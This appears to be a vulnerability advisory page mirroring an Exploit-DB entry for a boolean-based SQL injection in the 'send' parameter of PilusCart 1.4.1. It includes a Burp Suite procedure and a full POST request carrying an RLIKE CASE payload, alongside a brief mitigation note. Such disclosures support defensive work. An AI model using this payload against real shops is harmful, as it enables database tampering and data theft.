PilusCart 1.4.1 - 'send' SQL Vulnerability

vendor:

PilusCart

by:

Mehmet EMIROGLU

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: PilusCart

Affected Version From: 1.4.2001

Affected Version To: 1.4.2001

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows with Wampp

2019

PilusCart 1.4.1 – ‘send’ SQL Vulnerability

The PiLuS 1.4.1 version of the web application PilusCart is vulnerable to SQL injection. By modifying the 'send' parameter in the POST request, an attacker can inject SQL code and manipulate the database.

Mitigation:

To mitigate this vulnerability, the vendor should implement proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

####################################################################

# Exploit Title: PilusCart 1.4.1 - 'send' SQL Vulnerability
# Dork: N/A
# Date: 10-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/pilus/
# Software Link: https://sourceforge.net/projects/pilus/
# Version: 1.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: PilusCart is a web-based online store management system, written in PHP scripting language as the most popular web programming language today. To store the data, PilusCart uses MySQL relational database management system.

####################################################################

# Vulnerabilities / Impact
# This web application called as PiLuS 1.4.1 version.
# Switch to the http://localhost/PiLUS/read-apa-itu-pdo
  fill in the red-colored parts that I have given in the link
  https://i.hizliresim.com/MV11La.jpg
  Get in with the burp suite. and add the payload
  at the end of the request to the attack pattern.

####################################################################

# POC - SQL (Boolean Based String)
# Parameters : send
# Attack Pattern : RLIKE (case when  7488715=7488715 then
0x656d69726f676c75 else 0x28 end)
# POST Request :
http://localhost/PiLUS/read-apa-itu-pdo?post_id=3&post_slug=apa-itu-pdo&nama_komentar=4866630&situs_web=9391510&captcha=4551404&token=473ec0c6bda264fefb8447c8ff01956248ea477c&isi_komentar=EMIROGLU2823174&send=Kirim
RLIKE
(case when  7488715=7488715 then 0x656d69726f676c75 else 0x28 end)